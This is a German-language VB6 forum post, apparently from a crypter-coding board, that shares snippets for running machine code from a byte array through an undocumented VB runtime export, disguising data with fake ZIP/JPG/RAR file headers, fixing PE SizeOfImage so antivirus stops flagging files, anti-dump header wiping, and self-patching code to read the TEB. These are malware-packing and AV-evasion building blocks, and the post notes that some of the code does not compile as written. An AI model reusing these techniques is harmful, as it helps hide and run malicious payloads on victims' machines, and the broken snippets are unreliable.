    ByVal dwShareMode&, _
    ByVal lpSecurityAttributes&, _
    ByVal dwCreationDisposition&, _
    ByVal dwFlagsAndAttributes&, _
    ByVal hTemplateFile&) As Long
    ' lpOverlapped is ByRef to a UDT, so a (zeroed) OVERLAPPED must always be
    ' passed; Windows reads the file position from it even for a synchronous handle.
    Private Declare Function ReadFile Lib "kernel32.dll" ( _
    ByVal hFile As Long, _
    ByRef lpBuffer As Any, _
    ByVal nNumberOfBytesToRead As Long, _
    ByRef lpNumberOfBytesRead As Long, _
    ByRef lpOverlapped As OVERLAPPED) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject&) As Long
    Private Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
    ' lpFileSize is a LARGE_INTEGER on the API side.  Currency is 8 bytes but
    ' VB6 interprets it as a fixed-point value scaled by 10000, so the caller
    ' must multiply by 10000 to get the byte count.
    Private Declare Function GetFileSizeEx Lib "kernel32.dll" (ByVal hFile As Long, ByRef lpFileSize As Currency) As Long
    Private Const GENERIC_READ As Long = &H80000000
    Private Const GENERIC_WRITE As Long = &H40000000
    Private Const FILE_SHARE_READ As Long = &H1&
    Private Const FILE_SHARE_WRITE As Long = &H2&
    Private Const CREATE_NEW            As Long = 1&
    Private Const CREATE_ALWAYS         As Long = 2&
    Private Const OPEN_EXISTING         As Long = 3&
    Private Const OPEN_ALWAYS           As Long = 4&
    Private Const TRUNCATE_EXISTING     As Long = 5&
    Private Const FILE_BEGIN            As Long = 0
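    Private Function getFileString(FileName As String) As String
        ' Reads a whole file through the wide-char Win32 API (CreateFileW), so
        ' paths with non-ANSI characters work, and returns the bytes as a String
        ' via StrConv(..., vbUnicode).
        '
        ' FileName : path of the file to read
        ' Returns  : the file contents; "" if the file cannot be opened, its size
        '            cannot be determined, it is larger than 2 GB, the read
        '            fails or comes back short, or the file is empty.
        '
        ' Fixes relative to the original: GetFileSizeEx returns the size in a
        ' Currency, which VB6 scales by 1/10000 - the original used that value
        ' directly and therefore read only 1/10000 of the file (nothing at all
        ' below ~5 KB).  The buffer is now exactly the file size (the original's
        ' ReDim (0 To size) appended a stray NUL), and the handle is closed only
        ' when one was actually opened.
        '
        ' StrConv(vbUnicode) maps every byte through the system ANSI code page,
        ' so the result is not a byte-transparent container; keep the Byte array
        ' if you need the raw data.
        Dim cySize          As Currency     ' 64-bit size, scaled by 1/10000
        Dim cbSize          As Long
        Dim hFile           As Long
        Dim ovl             As OVERLAPPED   ' zeroed: read from offset 0
        Dim buf()           As Byte
        Dim cbRead          As Long

        hFile = CreateFile(StrPtr(FileName), GENERIC_READ, FILE_SHARE_READ, 0&, OPEN_EXISTING, 0&, 0&)
        If hFile = -1 Then Exit Function                 ' INVALID_HANDLE_VALUE: nothing to close

        If GetFileSizeEx(hFile, cySize) <> 0 Then
            ' Undo the Currency scaling; ReadFile takes a Long, so cap at 2 GB.
            If cySize > 0 And cySize * 10000 <= 2147483647 Then
                cbSize = CLng(cySize * 10000)
                ReDim buf(0 To cbSize - 1)
                Call SetFilePointer(hFile, 0, ByVal 0&, FILE_BEGIN)
                If ReadFile(hFile, buf(0), cbSize, cbRead, ovl) <> 0 Then
                    If cbRead = cbSize Then getFileString = StrConv(buf, vbUnicode)
                End If
            End If
        End If

        CloseHandle hFile
    End Function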
    So nutzt ihr sie:
    Code:
    ' getFileString returns the contents, so one assignment replaces the
    ' Open/Space/Get/Close sequence above.
    Dim Size as String
    Size = getFileString("c:\a.txt")
    ----------------------------------------------------------------------------------------------------------------
    Hier eine Funktion, die keine CallWindowProcW-API nutzt, um Maschinencode auszuführen. Daraus könnt ihr ganz einfach ein CallApiByName basteln; ich werde die Tage auch ein paar releasen. Hinweis: So wie gepostet compiliert RunPayload nicht (eine schließende Klammer zu viel), und die Declare-Zeile verwendet den Parameternamen ptr2 doppelt.
    Code:
    ' Undocumented export of the VB6 runtime used here as a way to get control
    ' transferred to AsmHandler.  NOTE(review): the parameter name ptr2 is used
    ' twice in this Declare, which VB6 presumably rejects as a duplicate
    ' declaration; and how the fourth argument leads to execution is not
    ' visible from this code.
    Private Declare Function SetMemNewObj Lib "msvbvm60" (ByVal ptr1 As Long, ByVal ptr2 As Long, ByVal ptr3 As Long, ByRef ptr2 As Long) As Long
    ' Helper types for AddLong: LSet between these two splits a Long into its
    ' four bytes in memory order (b1 = least significant on x86).
    Private Type DUMB_LONG
        lLNG        As Long
    End Type
     
    Private Type BYTES_LONG
        b1          As Byte:    b2          As Byte
        b3          As Byte:    b4          As Byte
    End Type
    Private Function RunPayload(ByRef ASM() As Byte) As Long
        ' Builds a 13-byte x86 trampoline that calls the code in ASM and hands
        ' it to SetMemNewObj.  Like GetFileName, this executes machine code
        ' from a Byte array, which DEP blocks; x86 only.
        ' NOTE(review): the SetMemNewObj line has one closing parenthesis too
        ' many and does not compile as posted; whether the intended expression is
        ' VarPtr(VarPtr(AsmHandler(0))) - 4 or VarPtr(VarPtr(AsmHandler(0)) - 4)
        ' cannot be told from here.
        Dim AsmHandler(&HC) As Byte
        ' Bytes, decoded:
        '   B8 <addr>      mov  eax, VarPtr(ASM(0))
        '   FF D0          call eax
        '   83 C4 0C       add  esp, 0Ch
        '   C2 08 00       ret  8          (not a plain RETN: pops 8 bytes of arguments)
        'MOV EAX, PTR
        'CALL EAX
        'ADD ESP,C
        'RETN
        AsmHandler(0) = &HB8:   AddLong AsmHandler, VarPtr(ASM(0)), 1
        AsmHandler(5) = &HFF:   AsmHandler(6) = &HD0
        AsmHandler(7) = &H83:   AsmHandler(8) = &HC4
        AsmHandler(9) = &HC:    AsmHandler(10) = &HC2
        AsmHandler(11) = &H8:   AsmHandler(12) = &H0
        RunPayload = SetMemNewObj(0, 0, 0, VarPtr(VarPtr(AsmHandler(0))) - &H4))
        
    End Function
    Private Sub AddLong(ByRef ASM() As Byte, ByVal lLong As Long, ByVal Index As Long)
        ' Stores lLong into ASM(Index .. Index+3) in x86 memory order, i.e.
        ' little-endian, least significant byte first.  This is a plain
        ' "write a 32-bit immediate" helper for building machine code; nothing
        ' is byte-swapped (the original comment said "Swap Endian", but LSet
        ' between DUMB_LONG and BYTES_LONG just exposes the bytes as stored).
        ' Negative values are handled as their two's-complement bit pattern.
        ' Index + 3 must be within the bounds of ASM.
        ASM(Index) = lLong And &HFF&
        ASM(Index + 1) = (lLong And &HFF00&) \ &H100&
        ASM(Index + 2) = (lLong And &HFF0000) \ &H10000
        ASM(Index + 3) = ((lLong And &HFF000000) \ &H1000000) And &HFF&
    End Sub
    ----------------------------------------------------------------------------------------------------------------
    Mit dieser Funktion könnt ihr einen Fake-Header (die ersten 10 Bytes eines anderen Dateityps: ZIP, RAR, BMP, JPG, GIF, ICO oder MSU) vor eure Daten setzen; das eignet sich z. B. gut in Kombination mit der Resource-Storage-Methode. Die Daten laufen dabei per StrConv durch die ANSI-Codepage, was für beliebige Binärdaten nicht verlustfrei ist.
    Code:
    Option Explicit
     
    ' File types whose first 10 bytes AddHeader can prepend.
    Public Enum Header_Type
        ZIP = 1: RAR = 2: BMP = 3: JPG = 4: GIF = 5: ICO = 6: MSU = 7
    End Enum
     
    ' Used by the original AddHeader as a memcpy into the current process
    ' (hProcess = -1 is the pseudo-handle for "this process").
    Public Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hProcess As Long, ByRef lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long
     
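    Public Function AddHeader(strBuffer As String, dwHeaderType As Header_Type) As String ' Add first 10 bytes from specified file type
        ' Prepends the first 10 bytes of a well-known file format (its "magic"
        ' prefix) to strBuffer and returns the combined data as a String.
        '
        ' strBuffer    : data to prefix; may be empty (the original raised
        '                error 9 on "" because UBound of an empty array fails)
        ' dwHeaderType : one of the Header_Type values.  An unknown value returns
        '                strBuffer unchanged; the original silently prepended
        '                ten zero bytes in that case.
        '
        ' strBuffer is treated as a byte container: it is converted with
        ' StrConv(vbFromUnicode) and the result converted back with
        ' StrConv(vbUnicode).  Both go through the system ANSI code page, so
        ' byte values that do not round-trip in that code page are NOT
        ' preserved - use a Byte array for binary payloads.
        '
        ' The copy into the result is a plain loop; the original routed it
        ' through NtWriteVirtualMemory(-1, ...), which is a memcpy with extra steps.
        Dim bHeader(9) As Byte
        Dim bArray() As Byte
        Dim bRes() As Byte
        Dim cbPayload As Long
        Dim i As Long

        Select Case dwHeaderType
        Case 1 ' ZIP
            FillMagic bHeader, &H50, &H4B, &H3, &H4, &H14, &H0, &H0, &H0, &H8, &H9
        Case 2 ' RAR
            FillMagic bHeader, &H52, &H61, &H72, &H21, &H1A, &H7, &H0, &HCF, &H90, &H73
        Case 3 ' BMP
            FillMagic bHeader, &H42, &H4D, &HD8, &HBB, &HD, &H0, &H0, &H0, &H0, &H0
        Case 4 ' JPG
            FillMagic bHeader, &HFF, &HD8, &HFF, &HE0, &H0, &H10, &H4A, &H46, &H49, &H46
        Case 5 ' GIF
            FillMagic bHeader, &H47, &H49, &H46, &H38, &H39, &H61, &H64, &H0, &H64, &H0
        Case 6 ' ICO
            FillMagic bHeader, &H0, &H0, &H1, &H0, &H8, &H0, &H30, &H30, &H0, &H0
        Case 7 ' MSU
            FillMagic bHeader, &H4D, &H53, &H43, &H46, &H0, &H0, &H0, &H0, &HE1, &H9
        Case Else
            AddHeader = strBuffer
            Exit Function
        End Select

        ' StrConv("") yields a zero-length array whose UBound raises error 9,
        ' so only touch the bounds when there is something to copy.
        If Len(strBuffer) > 0 Then
            bArray() = StrConv(strBuffer, vbFromUnicode)
            cbPayload = UBound(bArray) - LBound(bArray) + 1
        End If

        ReDim bRes(0 To 9 + cbPayload)
        For i = 0 To 9
            bRes(i) = bHeader(i)
        Next i
        For i = 0 To cbPayload - 1
            bRes(10 + i) = bArray(LBound(bArray) + i)
        Next i

        AddHeader = StrConv(bRes(), vbUnicode)
    End Function

    ' Copies the listed byte values into bHeader(0 ..).  bHeader must have at
    ' least as many elements as values are passed.
    Private Sub FillMagic(ByRef bHeader() As Byte, ParamArray values() As Variant)
        Dim i As Long
        For i = LBound(values) To UBound(values)
            bHeader(i - LBound(values)) = CByte(values(i))
        Next i
    End Sub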
    ----------------------------------------------------------------------------------------------------------------
    Hier eine Funktion, mit der ihr SizeOfImage im PE-Header anpassen könnt; manche AVs melden Dateien, bei denen der Wert nicht stimmt. Wichtig: SizeOfImage ist die virtuelle Größe des geladenen Images (Ende der letzten Section, aufgerundet auf SectionAlignment) und nicht die Dateigröße.
    Code:
    Option Explicit
    ' PE32 header layout as VB6 UDTs (memory layout: do not reorder fields).
    ' FixSizeOfImage reads and writes them with Get/Put, which store a UDT as
    ' its raw bytes (fixed-length strings without a length prefix).
    ' Sizes: DOS header 64, NT headers 248 (4 + 20 + 224), section header 40.
    Private Const IMAGE_DOS_SIGNATURE           As Long = &H5A4D&   ' "MZ"
    Private Const IMAGE_NT_SIGNATURE            As Long = &H4550&   ' "PE\0\0"
    Private Const IMAGE_NT_OPTIONAL_HDR32_MAGIC As Long = &H10B&    ' OptionalHeader.Magic for PE32
    Private Const SIZE_DOS_HEADER               As Long = &H40
    Private Const SIZE_NT_HEADERS               As Long = &HF8      ' PE32 only
    Private Const SIZE_SECTION_HEADER           As Long = &H28
    Private Type IMAGE_DOS_HEADER
        e_magic                     As Integer
        e_cblp                      As Integer
        e_cp                        As Integer
        e_crlc                      As Integer
        e_cparhdr                   As Integer
        e_minalloc                  As Integer
        e_maxalloc                  As Integer
        e_ss                        As Integer
        e_sp                        As Integer
        e_csum                      As Integer
        e_ip                        As Integer
        e_cs                        As Integer
        e_lfarlc                    As Integer
        e_ovno                      As Integer
        e_res(0 To 3)               As Integer
        e_oemid                     As Integer
        e_oeminfo                   As Integer
        e_res2(0 To 9)              As Integer
        e_lfanew                    As Long     ' file offset of the PE signature
    End Type
    Private Type IMAGE_FILE_HEADER
        Machine                     As Integer
        NumberOfSections            As Integer  ' number of 40-byte section headers
        TimeDateStamp               As Long
        PointerToSymbolTable        As Long
        NumberOfSymbols             As Long
        SizeOfOptionalHeader        As Integer  ' 224 for a standard PE32
        Characteristics             As Integer
    End Type
    Private Type IMAGE_DATA_DIRECTORY
        VirtualAddress              As Long
        Size                        As Long
    End Type
    Private Type IMAGE_OPTIONAL_HEADER
        Magic                       As Integer  ' &H10B = PE32; layout below is valid only for that
        MajorLinkerVersion          As Byte
        MinorLinkerVersion          As Byte
        SizeOfCode                  As Long
        SizeOfInitializedData       As Long
        SizeOfUnitializedData       As Long     ' sic (SizeOfUninitializedData)
        AddressOfEntryPoint         As Long
        BaseOfCode                  As Long
        BaseOfData                  As Long
        ImageBase                   As Long
        SectionAlignment            As Long     ' in-memory alignment; SizeOfImage is a multiple of it
        FileAlignment               As Long
        MajorOperatingSystemVersion As Integer
        MinorOperatingSystemVersion As Integer
        MajorImageVersion           As Integer
        MinorImageVersion           As Integer
        MajorSubsystemVersion       As Integer
        MinorSubsystemVersion       As Integer
        W32VersionValue             As Long
        SizeOfImage                 As Long     ' virtual size of the mapped image, NOT the file size
        SizeOfHeaders               As Long
        Checksum                    As Long
        Subsystem                   As Integer
        DllCharacteristics          As Integer
        SizeOfStackReserve          As Long
        SizeOfStackCommit           As Long
        SizeOfHeapReserve           As Long
        SizeOfHeapCommit            As Long
        LoaderFlags                 As Long
        NumberOfRvaAndSizes         As Long
        DataDirectory(0 To 15)      As IMAGE_DATA_DIRECTORY
    End Type
    Private Type IMAGE_NT_HEADERS
        Signature                   As Long
        FileHeader                  As IMAGE_FILE_HEADER
        OptionalHeader              As IMAGE_OPTIONAL_HEADER
    End Type
    Private Type IMAGE_SECTION_HEADER
        SecName                     As String * 8   ' Get/Put read and write this as 8 raw bytes
        VirtualSize                 As Long
        VirtualAddress              As Long
        SizeOfRawData               As Long
        PointerToRawData            As Long
        PointerToRelocations        As Long
        PointerToLinenumbers        As Long
        NumberOfRelocations         As Integer
        NumberOfLinenumbers         As Integer
        Characteristics             As Long
    End Type
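    Public Function FixSizeOfImage(sStrPath As String)
        ' Recomputes OptionalHeader.SizeOfImage of a PE32 file from its section
        ' table and writes it back in place.
        '
        ' SizeOfImage is the size of the image as mapped in memory: the end of
        ' the last section (VirtualAddress + VirtualSize) rounded up to
        ' SectionAlignment.  The original stored the FILE size instead, which is
        ' a different quantity (sections are laid out on FileAlignment on disk
        ' and on SectionAlignment in memory) and can make the loader reject the
        ' image.  It also read the whole file into a String just to measure it.
        '
        ' sStrPath : PE file, modified in place
        ' Returns  : nothing (declared without a type, as before).  The file is
        '            left untouched if it is not a PE32 image this handles.
        Dim h As Integer
        Dim cbFile As Long, lpSec As Long, lEnd As Long, lAlign As Long
        Dim tDOS As IMAGE_DOS_HEADER
        Dim tNT As IMAGE_NT_HEADERS
        Dim tSec As IMAGE_SECTION_HEADER

        h = FreeFile
        Open sStrPath For Binary As #h
        cbFile = LOF(h)
        If cbFile < SIZE_DOS_HEADER Then Close #h: Exit Function

        ' Get/Put positions are 1-based, hence "1 + offset" throughout.
        Get #h, 1, tDOS
        If tDOS.e_magic <> IMAGE_DOS_SIGNATURE Or tDOS.e_lfanew < SIZE_DOS_HEADER _
           Or tDOS.e_lfanew + SIZE_NT_HEADERS > cbFile Then Close #h: Exit Function
        Get #h, 1 + tDOS.e_lfanew, tNT
        If tNT.Signature <> IMAGE_NT_SIGNATURE _
           Or tNT.OptionalHeader.Magic <> IMAGE_NT_OPTIONAL_HDR32_MAGIC _
           Or tNT.FileHeader.NumberOfSections < 1 Then Close #h: Exit Function

        ' Last section header: 24 = PE signature + IMAGE_FILE_HEADER, then the
        ' optional header as sized by the file header, then n-1 section headers.
        lpSec = tDOS.e_lfanew + 24 + tNT.FileHeader.SizeOfOptionalHeader _
                + (tNT.FileHeader.NumberOfSections - 1) * SIZE_SECTION_HEADER
        If lpSec + SIZE_SECTION_HEADER > cbFile Then Close #h: Exit Function
        Get #h, 1 + lpSec, tSec

        ' End of the last section in memory.  A zero VirtualSize presumably
        ' falls back to SizeOfRawData, as the loader does - TODO confirm.
        lEnd = tSec.VirtualSize
        If lEnd = 0 Then lEnd = tSec.SizeOfRawData
        lEnd = tSec.VirtualAddress + lEnd
        lAlign = tNT.OptionalHeader.SectionAlignment
        If lAlign > 0 Then
            If (lEnd Mod lAlign) <> 0 Then lEnd = lEnd + (lAlign - (lEnd Mod lAlign))
        End If

        tNT.OptionalHeader.SizeOfImage = lEnd
        Put #h, 1 + tDOS.e_lfanew, tNT
        Close #h
    End Function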
    ----------------------------------------------------------------------------------------------------------------
    Mit dieser Funktion könnt ihr das Dumpen eures Prozesses erschweren: Sie überschreibt die ersten 64 Bytes (den DOS-Header) des geladenen Images im Speicher mit Nullen. Gegen Debugger hilft das nicht, und alles, was danach die PE-Header des Hauptmoduls zur Laufzeit liest (z. B. FindResource/LoadResource), kann fehlschlagen.
    Code:
    Option Explicit
    ' GetModuleHandleA(vbNullString) returns the base address of the main module.
    Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal lpModuleName As String) As Long
    ' memmove; Destination/source are ByRef "As Any", so pass ByVal <address> for raw pointers.
    Private Declare Sub RtlMoveMemory Lib "kernel32" (Destination As Any, source As Any, ByVal Length As Long)
    ' lpAddress is ByRef "As Any": pass ByVal <address>.  Returns 0 on failure.
    Private Declare Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As Long, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long
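    Public Sub sAntiDump()
        ' Overwrites the first 64 bytes (the IMAGE_DOS_HEADER) of this process's
        ' own main module in memory with zeros, so a naive memory dump no longer
        ' starts with a valid MZ header / e_lfanew.  This does nothing against
        ' a debugger.
        '
        ' Side effects: anything that later parses the main module's headers in
        ' memory - FindResource/LoadResource, or any code that walks e_lfanew -
        ' may fail after this call; make sure the program's resources are loaded
        ' before calling it.  Silently does nothing if the page cannot be made
        ' writable (the original ignored the VirtualProtect result and would
        ' then have faulted in RtlMoveMemory).
        Const PAGE_READWRITE As Long = &H4
        Dim hModule As Long
        Dim bZero(63) As Byte       ' VB6 zero-initialises arrays: this IS the replacement header
        Dim lngOldProtect As Long
        Dim lngDummy As Long

        hModule = GetModuleHandleA(vbNullString)
        If hModule = 0 Then Exit Sub
        ' PAGE_READWRITE is all a memcpy needs; the original requested
        ' PAGE_EXECUTE_READWRITE (&H40), more than the operation requires.
        If VirtualProtect(ByVal hModule, 64, PAGE_READWRITE, lngOldProtect) = 0 Then Exit Sub
        RtlMoveMemory ByVal hModule, bZero(0), 64
        ' Restore the previous protection.  Use a separate out-variable: the
        ' original passed lngOldProtect as both the new value and the output.
        VirtualProtect ByVal hModule, 64, lngOldProtect, lngDummy
    End Sub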
    ----------------------------------------------------------------------------------------------------------------
    Mit diesem Code könnt ihr die TEB-Adresse des aktuellen Threads herausfinden (nur 32-Bit, nur nativ compiliert). Aufgerufen wird es so: teb = GetTEB()
    Code:
    ' memmove with both pointers ByVal, so callers pass raw addresses (VarPtr / function address).
    Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByVal Destination As Any, ByVal Source As Any, ByVal Length As Long)
    Public Function GetTEB() As Long
        ' Returns the address of the current thread's TEB (fs:[18h] =
        ' TEB.NtTib.Self; x86 only).
        '
        ' Mechanism: the first 7 bytes of DoNotCall's compiled code are saved,
        ' overwritten with "mov eax, fs:[18h]; ret", DoNotCall is called, and
        ' the saved bytes are written back.  Requirements this code does NOT
        ' check:
        '  - native compilation: in the IDE, AddressOf presumably resolves to a
        '    p-code thunk rather than real machine code;
        '  - a writable code page: there is no VirtualProtect before the
        '    CopyMemory writes.  NOTE(review): code sections are normally mapped
        '    execute/read-only, so confirm how this was tested;
        '  - single-threaded use: any other thread calling DoNotCall during the
        '    patch window would run the stub instead.
        Dim b(6) As Byte    ' replacement code
        Dim c(6) As Byte    ' saved original bytes of DoNotCall
        Dim d As Long       ' address of DoNotCall
        
        b(0) = &H64 'MOV
        b(1) = &HA1 'EAX
        b(2) = &H18 '[FS:0x18]
        b(3) = &H0
        b(4) = &H0
        b(5) = &H0
        b(6) = &HC3 'RET
        
        ' DoNotCall just returns its argument, so passing AddressOf DoNotCall
        ' through it yields the function's own address.
        d = DoNotCall(AddressOf DoNotCall)
        
        CopyMemory ByVal VarPtr(c(0)), ByVal d, 7       ' save
        CopyMemory ByVal d, ByVal VarPtr(b(0)), 7       ' patch
        GetTEB = DoNotCall                              ' executes the stub
        CopyMemory ByVal d, ByVal VarPtr(c(0)), 7       ' restore
    End Function
    Public Function DoNotCall(Optional a As Long) As Long
        ' Patch target for GetTEB: GetTEB obtains this function's address by
        ' passing AddressOf DoNotCall through a, then temporarily overwrites
        ' its first 7 compiled bytes.  Called normally it returns a unchanged.
        ' Do not remove, inline, or call it from another thread while GetTEB runs.
        DoNotCall = a
    End Function
    Ich habe hier mal ein wenig aufgeräumt. mfg Barny
